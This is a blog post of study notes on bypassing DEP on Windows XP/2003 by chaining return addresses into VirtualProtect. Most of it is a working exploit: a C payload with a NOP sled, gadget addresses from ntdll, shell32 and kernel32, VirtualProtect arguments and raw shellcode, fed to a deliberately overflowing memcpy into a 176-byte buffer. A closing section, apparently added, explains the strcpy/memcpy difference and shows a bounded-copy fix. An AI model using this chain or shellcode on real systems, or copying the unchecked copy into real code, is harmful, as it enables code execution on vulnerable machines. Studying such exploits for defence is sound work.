• Ret2libc using VirtualProtect


    DEP concept

    First: Windows 2003 has DEP enabled by default, so 2003 is what is generally used for these experiments.

    Today I used XP with DEP turned on for the experiment; it is the same thing.

    These are just study notes.

    Another method: Ret2libc to NtSetInformationProcess to turn DEP off.

    BOOL VirtualProtect(
    LPVOID lpAddress, // start of the target region        *start address of the memory holding the shellcode
    DWORD dwSize, // size of the region                    *size of the shellcode
    DWORD flNewProtect, // requested protection            *0x40 PAGE_EXECUTE_READWRITE
    PDWORD lpflOldProtect // receives the old protection   *any writable address
    );
    Returns non-zero on success, 0 if the change fails.


    Summary first:

    First, what is usually overwritten is the return address. Because software DEP, that is, SafeSEH, is in effect, the code you return into must come from an executable module!!!

    !searchcode jmp esp can show the module attributes; you need this when looking for specific instruction sequences under DEP!!!


    The example in the book overwrites the return address, and the vulnerable function is changed from strcpy to memcpy, because memcpy does not stop at "\x00".


    #include "stdafx.h"
    #include <windows.h>
    #include <string.h>   // memcpy
    
    // Overflow payload: NOP sled, then the addresses that lead into VirtualProtect, then the shellcode.
    char shellcode[] = 
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    
    // Note: this address cannot be found quickly with the OllyDbg plugin; use !searchcode jmp esp
    //7C80997D    58              pop eax ret 
    "\x7d\x99\x80\x7c"
    
    //Address=7C92E7D9
    //Message=Found:POP ESI POP EBX POP EDI  RETN at 0x7c92e7d9     Module:  C:\WINDOWS\system32\ntdll.dll
    "\xd9\xe7\x92\x7c"//ESP, EBP and EAX must not be modified here
    
    //Address=7D760702
    //Message=Found:PUSH ESP POP EBP RET 4 at 0x7d760702     Module:  C:\WINDOWS\system32\shell32.dll
    "\x02\x07\x76\x7d"
    
    //7C92120F    C3          retn
    "\x0f\x12\x92\x7c"
    
    "\x90\x90\x90\x90"
    
    "\xc6\xc6\xeb\x77"//77EBC6C6   push esp jmp esp
    
    "\xff\x00\x00\x00"  //dwSize: size of the region to change
    "\x40\x00\x00\x00"  //flNewProtect: 0x40 = PAGE_EXECUTE_READWRITE
    
    "\xc6\xc6\xeb\x77"//77EBC6C6   push esp jmp eax
    
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
    /*
    7C801AD9    FF75 14         push dword ptr ss:[ebp+0x14]
    7C801ADC    FF75 10         push dword ptr ss:[ebp+0x10]
    7C801ADF    FF75 0C         push dword ptr ss:[ebp+0xC]
    7C801AE2    FF75 08         push dword ptr ss:[ebp+0x8]
    7C801AE5    6A FF           push -0x1
    7C801AE7    E8 75FFFFFF     call kernel32.VirtualProtectEx */
    "\xd9\x1a\x80\x7c"
    
    "\x90\x90\x90\x90"
    
    //7C8369F0    FFD4            call esp
    "\xf0\x69\x83\x7c"
    
    
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
    
    //shellcode:
    "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
    "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
    "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
    "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
    "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
    "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
    "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
    "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
    "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
    "\x53"
    "\x68\x64\x61\x30\x23"
    "\x68\x23\x50\x61\x6E"
    "\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8";//168
    
    // Deliberately vulnerable: str holds 176 bytes but 420 are copied in,
    // so the saved return address is overwritten by the chain above.
    void test()
    {
    	char str[176];
    	memcpy(str,shellcode,420);
    }
    int main(int argc, char* argv[])
    {
    	HINSTANCE hInst = LoadLibrary("shell32.dll"); // make sure shell32.dll, which the chain above uses, is loaded
    	char temp[200];
    	test();
    	return 0;
    }
    

    This method is not convenient; let's see whether it can be gotten around, because strcpy truncates at the zero byte.
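The point made in the note on the book's example and in the remark just above (memcpy carries the zero bytes that strcpy stops at, and the copy length in test() is never checked against str) is illustrated by the following added C example. It is not part of the original post: the payload bytes, the copy_bounded helper and the demo functions are constructed for the illustration, while the sizes 176 and 420 are the post's own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample input (not from the original post): a NOP, then a zero
   byte like the ones inside the chain's addresses and the 0x000000ff /
   0x00000040 arguments, then filler. */
static const unsigned char payload[] = {
    0x90, 0x00, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48
};

/* strcpy treats the source as a C string and stops at the first 0x00.
   Returns how many bytes actually arrived in the destination. */
size_t strcpy_copied_bytes(const unsigned char *src)
{
    char dst[64];
    /* safe here: the constructed payload has a zero byte well inside 64 bytes */
    strcpy(dst, (const char *)src);
    return strlen(dst);
}

/* The vulnerable shape of test(): a fixed-size destination and a copy length
   that ignores it. Returns how many bytes would land past the end. */
size_t overflow_excess(size_t dst_size, size_t copy_len)
{
    return copy_len > dst_size ? copy_len - dst_size : 0;
}

/* Hardened replacement (assumed helper): validate the length before any byte
   is moved, and reject oversized input outright instead of truncating it
   silently. Returns 0 on success, -1 when the copy is refused. */
int copy_bounded(unsigned char *dst, size_t dst_size,
                 const unsigned char *src, size_t src_len)
{
    if (dst == NULL || src == NULL) return -1;
    if (src_len > dst_size) return -1;
    memcpy(dst, src, src_len);
    return 0;
}

/* In-range copy into the same 176-byte destination as the post's str[]. */
int demo_bounded_fit(void)
{
    unsigned char str[176];
    return copy_bounded(str, sizeof str, payload, sizeof payload);
}

/* The post's 420-byte copy into 176 bytes, now refused rather than
   overwriting the stack. */
int demo_bounded_reject(void)
{
    unsigned char str[176];
    unsigned char big[420];               /* constructed oversized input */
    memset(big, 0x90, sizeof big);
    return copy_bounded(str, sizeof str, big, sizeof big);
}

int main(void)
{
    printf("strcpy delivered %zu of %zu payload bytes\n",
           strcpy_copied_bytes(payload), sizeof payload);
    printf("memcpy(str, shellcode, 420) into char str[176] overruns by %zu bytes\n",
           overflow_excess(176, 420));
    printf("bounded copy: fit=%d reject=%d\n",
           demo_bounded_fit(), demo_bounded_reject());
    return 0;
}
```

Rejecting rather than truncating matters: a silently shortened copy hides the bug, while an explicit error at the length check is something a caller can log and a test can catch.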
  • Original source: https://www.cnblogs.com/zcc1414/p/3982386.html